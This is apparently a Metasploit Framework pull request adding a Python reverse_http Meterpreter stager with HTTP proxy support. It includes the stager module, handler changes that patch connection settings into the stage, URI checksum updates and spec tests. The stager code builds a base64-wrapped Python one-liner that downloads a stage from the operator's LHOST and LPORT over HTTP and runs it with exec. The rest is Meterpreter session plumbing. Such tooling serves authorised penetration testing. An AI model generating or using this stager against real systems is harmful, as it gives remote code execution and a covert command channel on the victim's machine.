### PR TITLE
Python reverse_http Stager

### DIFF
--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -60,9 +60,9 @@ if sys.version_info[0] < 3:
 	bytes = lambda *args: str(*args[:1])
 	NULL_BYTE = '\x00'
 else:
-	is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
+	is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
 	is_bytes = lambda obj: issubclass(obj.__class__, bytes)
-	str = lambda x: __builtins__['str'](x, 'UTF-8')
+	str = lambda x: __builtins__.str(x, 'UTF-8')
 	NULL_BYTE = bytes('\x00', 'UTF-8')
 	long = int
 

--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -60,9 +60,13 @@ if sys.version_info[0] < 3:
 	bytes = lambda *args: str(*args[:1])
 	NULL_BYTE = '\x00'
 else:
-	is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
+	if isinstance(__builtins__, dict):
+		is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
+		str = lambda x: __builtins__['str'](x, 'UTF-8')
+	else:
+		is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
+		str = lambda x: __builtins__.str(x, 'UTF-8')
 	is_bytes = lambda obj: issubclass(obj.__class__, bytes)
-	str = lambda x: __builtins__.str(x, 'UTF-8')
 	NULL_BYTE = bytes('\x00', 'UTF-8')
 	long = int
 

--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -501,6 +501,8 @@ IFLA_MTU       = 4
 IFA_ADDRESS    = 1
 IFA_LABEL      = 3
 
+meterpreter.register_extension('stdapi')
+
 def calculate_32bit_netmask(bits):
 	if bits == 32:
 		return 0xffffffff

--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -19,7 +19,7 @@ else:
 	has_windll = hasattr(ctypes, 'windll')
 
 try:
-	urllib_imports = ['build_opener', 'install_opener', 'urlopen']
+	urllib_imports = ['ProxyHandler', 'build_opener', 'install_opener', 'urlopen']
 	if sys.version_info[0] < 3:
 		urllib = __import__('urllib2', fromlist=urllib_imports)
 	else:
@@ -49,6 +49,7 @@ DEBUGGING = False
 HTTP_COMMUNICATION_TIMEOUT = 300
 HTTP_CONNECTION_URL = None
 HTTP_EXPIRATION_TIMEOUT = 604800
+HTTP_PROXY = None
 HTTP_USER_AGENT = None
 
 PACKET_TYPE_REQUEST        = 0
@@ -326,7 +327,11 @@ class PythonMeterpreter(object):
 			self.running = True
 
 	def driver_init_http(self):
-		opener = urllib.build_opener()
+		if HTTP_PROXY:
+			proxy_handler = urllib.ProxyHandler({'http': HTTP_PROXY})
+			opener = urllib.build_opener(proxy_handler)
+		else:
+			opener = urllib.build_opener()
 		if HTTP_USER_AGENT:
 			opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
 		urllib.install_opener(opener)

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -201,11 +201,15 @@ protected
         blob = ""
         blob << obj.generate_stage
 
+        var_escape = lambda { |txt|
+          txt.gsub('\\', '\\'*8).gsub('\'', %q(\\\\\\\'))
+        }
+
         # Patch all the things
-        blob = blob.sub("HTTP_CONNECTION_URL = None", "HTTP_CONNECTION_URL = '#{url}'")
-        blob = blob.sub("HTTP_EXPIRATION_TIMEOUT = 604800", "HTTP_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
-        blob = blob.sub("HTTP_COMMUNICATION_TIMEOUT = 300", "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
-        blob = blob.sub("HTTP_USER_AGENT = None", "HTTP_USER_AGENT = '#{datastore['MeterpreterUserAgent']}'")
+        blob.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(url)}'")
+        blob.sub!('HTTP_EXPIRATION_TIMEOUT = 604800', "HTTP_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
+        blob.sub!('HTTP_COMMUNICATION_TIMEOUT = 300', "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
+        blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(datastore['MeterpreterUserAgent'])}'")
 
         resp.body = blob
 

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -201,8 +201,11 @@ protected
         blob = ""
         blob << obj.generate_stage
 
-        # Patch the conn_id
-        blob = blob.sub("CONNECTION_URL = None", "CONNECTION_URL = '#{url}'")
+        # Patch all the things
+        blob = blob.sub("HTTP_CONNECTION_URL = None", "HTTP_CONNECTION_URL = '#{url}'")
+        blob = blob.sub("HTTP_EXPIRATION_TIMEOUT = 604800", "HTTP_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
+        blob = blob.sub("HTTP_COMMUNICATION_TIMEOUT = 300", "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
+        blob = blob.sub("HTTP_USER_AGENT = None", "HTTP_USER_AGENT = '#{datastore['MeterpreterUserAgent']}'")
 
         resp.body = blob
 
@@ -215,6 +218,7 @@ protected
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :ssl                => ssl?,
         })
+
       when /^\/INITJM/
         conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
         url = payload_uri + conn_id + "/\x00"
@@ -222,7 +226,7 @@ protected
         blob = ""
         blob << obj.generate_stage
 
-        # This is a TLV packet - I guess somewhere there should be API for building them
+        # This is a TLV packet - I guess somewhere there should be an API for building them
         # in Metasploit :-)
         packet = ""
         packet << ["core_switch_url\x00".length + 8, 0x10001].pack('NN') + "core_switch_url\x00"

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -211,6 +211,11 @@ protected
         blob.sub!('HTTP_COMMUNICATION_TIMEOUT = 300', "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
         blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(datastore['MeterpreterUserAgent'])}'")
 
+        unless datastore['PROXYHOST'].blank?
+          proxy_url = "http://#{datastore['PROXYHOST']}:#{datastore['PROXYPORT']}"
+          blob.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+        end
+
         resp.body = blob
 
         # Short-circuit the payload's handle_connection processing for create_session

--- a/lib/msf/core/handler/reverse_http/uri_checksum.rb
+++ b/lib/msf/core/handler/reverse_http/uri_checksum.rb
@@ -8,8 +8,9 @@ module Msf
         # Define 8-bit checksums for matching URLs
         # These are based on charset frequency
         #
-        URI_CHECKSUM_INITW = 92
-        URI_CHECKSUM_INITJ = 88
+        URI_CHECKSUM_INITW = 92 # Windows
+        URI_CHECKSUM_INITP = 80 # Python
+        URI_CHECKSUM_INITJ = 88 # Java
         URI_CHECKSUM_CONN  = 98
 
         #
@@ -61,6 +62,8 @@ module Msf
           case uri_check
             when URI_CHECKSUM_INITW
               uri_match = "/INITM"
+            when URI_CHECKSUM_INITP
+              uri_match = "/INITPY"
             when URI_CHECKSUM_INITJ
               uri_match = "/INITJM"
             when URI_CHECKSUM_CONN

--- a/lib/msf/core/handler/reverse_https_proxy.rb
+++ b/lib/msf/core/handler/reverse_https_proxy.rb
@@ -45,7 +45,7 @@ module ReverseHttpsProxy
         OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
         OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
         OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
- 			], Msf::Handler::ReverseHttpsProxy)
+      ], Msf::Handler::ReverseHttpsProxy)
 
     register_advanced_options(
       [

--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -96,7 +96,7 @@ module PacketDispatcher
 
     # If the first 4 bytes are "RECV", return the oldest packet from the outbound queue
     if req.body[0,4] == "RECV"
-      rpkt = send_queue.pop
+      rpkt = send_queue.shift
       resp.body = rpkt || ''
       begin
         cli.send_response(resp)

--- a/modules/payloads/stagers/python/reverse_http.rb
+++ b/modules/payloads/stagers/python/reverse_http.rb
@@ -48,15 +48,14 @@ module Metasploit3
 
     cmd  = "import sys\n"
     if datastore['PROXYHOST'].blank?
-      cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener'])\n"
-      cmd << "opener=ul.build_opener()\n"
+      cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n"
     else
       proxy_url = "http://#{datastore['PROXYHOST']}:#{datastore['PROXYPORT']}"
       cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n"
-      cmd << "opener=ul.build_opener(ul.ProxyHandler({'http':'#{var_escape.call(proxy_url)}'}))\n"
+      cmd << "o=ul.build_opener(ul.ProxyHandler({'http':'#{var_escape.call(proxy_url)}'}))\n"
     end
-    cmd << "opener.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
-    cmd << "exec(opener.open('#{target_url}').read())\n"
+    cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
+    cmd << "exec(o.open('#{target_url}').read())\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
     b64_stub  = "import base64,sys;exec(base64.b64decode("

--- a/modules/payloads/stagers/python/reverse_http.rb
+++ b/modules/payloads/stagers/python/reverse_http.rb
@@ -25,13 +25,6 @@ module Metasploit3
   end
 
   #
-  # Do not transmit the stage over the connection.  We handle this via HTTPS
-  #
-  def stage_over_connection?
-    false
-  end
-
-  #
   # Constructs the payload
   #
   def generate
@@ -53,12 +46,5 @@ module Metasploit3
     b64_stub << Rex::Text.encode_base64(cmd)
     b64_stub << "')))"
     return b64_stub
-  end
-
-  #
-  # Always wait at least 20 seconds for this payload (due to staging delays)
-  #
-  def wfs_delay
-    20
   end
 end

--- a/modules/payloads/stagers/python/reverse_http.rb
+++ b/modules/payloads/stagers/python/reverse_http.rb
@@ -1,0 +1,64 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_http'
+
+module Metasploit3
+
+  include Msf::Payload::Stager
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Python Reverse HTTP Stager',
+      'Description'   => 'Tunnel communication over HTTP',
+      'Author'        => 'Spencer McIntyre',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'python',
+      'Arch'          => ARCH_PYTHON,
+      'Handler'       => Msf::Handler::ReverseHttp,
+      'Convention'    => 'http',
+      'Stager'        => {'Payload' => ""}
+    ))
+  end
+
+  #
+  # Do not transmit the stage over the connection.  We handle this via HTTPS
+  #
+  def stage_over_connection?
+    false
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    lhost = datastore['LHOST'] || Rex::Socket.source_address
+
+    target_url  = 'http://'
+    target_url << lhost
+    target_url << ':'
+    target_url << datastore['LPORT'].to_s
+    target_url << '/'
+    target_url << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP)
+
+    cmd  = "import sys\n"
+    cmd << "exec(__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]], fromlist=['urlopen']).urlopen('#{target_url}').read())\n"
+
+    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+    b64_stub  = "import base64,sys;exec(base64.b64decode("
+    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
+    b64_stub << Rex::Text.encode_base64(cmd)
+    b64_stub << "')))"
+    return b64_stub
+  end
+
+  #
+  # Always wait at least 20 seconds for this payload (due to staging delays)
+  #
+  def wfs_delay
+    20
+  end
+end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -1837,6 +1837,16 @@ describe 'modules/payloads', :content do
                           reference_name: 'python/meterpreter/bind_tcp'
   end
 
+  context 'python/meterpreter/reverse_http' do
+    it_should_behave_like 'payload can be instantiated',
+                          ancestor_reference_name: [
+                            'stagers/python/reverse_http',
+                            'stages/python/meterpreter'
+                          ],
+                          modules_pathname: modules_pathname,
+                          reference_name: 'python/meterpreter/reverse_http'
+  end
+
   context 'python/meterpreter/reverse_tcp' do
     it_should_behave_like 'payload can be instantiated',
                           ancestor_reference_names: [

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -1839,7 +1839,7 @@ describe 'modules/payloads', :content do
 
   context 'python/meterpreter/reverse_http' do
     it_should_behave_like 'payload can be instantiated',
-                          ancestor_reference_name: [
+                          ancestor_reference_names: [
                             'stagers/python/reverse_http',
                             'stages/python/meterpreter'
                           ],

--- a/tools/missing-payload-tests.rb
+++ b/tools/missing-payload-tests.rb
@@ -62,15 +62,15 @@ File.open('log/untested-payloads.log') { |f|
          $stderr.puts
          $stderr.puts "  context '#{reference_name}' do\n" \
                       "    it_should_behave_like 'payload can be instantiated',\n" \
-                      "                          ancestor_reference_name: ["
+                      "                          ancestor_reference_names: ["
 
          ancestor_reference_names = options[:ancestor_reference_names]
 
          if ancestor_reference_names.length == 1
            $stderr.puts "                            '#{ancestor_reference_names[0]}'"
          else
-           $stderr.puts "                            '#{ancestor_reference_names[0]}',"
-           $stderr.puts "                            '#{ancestor_reference_names[1]}'"
+           $stderr.puts "                            '#{ancestor_reference_names[1]}',"
+           $stderr.puts "                            '#{ancestor_reference_names[0]}'"
          end
 
          $stderr.puts "                          ],\n" \


### PR DESCRIPTION
This pull request adds a reverse_http stager for Python with support for HTTP proxies. By default, if no proxy is set by the user then Python will try to determine one from the environment. The exact places it checks are dependent on the OS and some details can be found in the urllib2 and urllib.request documentation.

Stay tuned for a PR to include a reverse_https version as well.

Tested on the following versions of Python:
- Python 2.7 on OS X
- Python 3.4 on OS X
- Python 2.5-2.7 & 3.1-3.4 on Ubuntu
- Python 2.5 on Windows XP
- Python 2.7 on Windows 7
- Python 3.4 on Windows 7

Testing Tasks:
- [x] Get a session over http
- [x] Verify that the `detach` command works as expected
- [x] All checks in post/test/meterpreter pass (16 pass, 0 failures)
- [x] An unauthenticated HTTP proxy can be specified and used
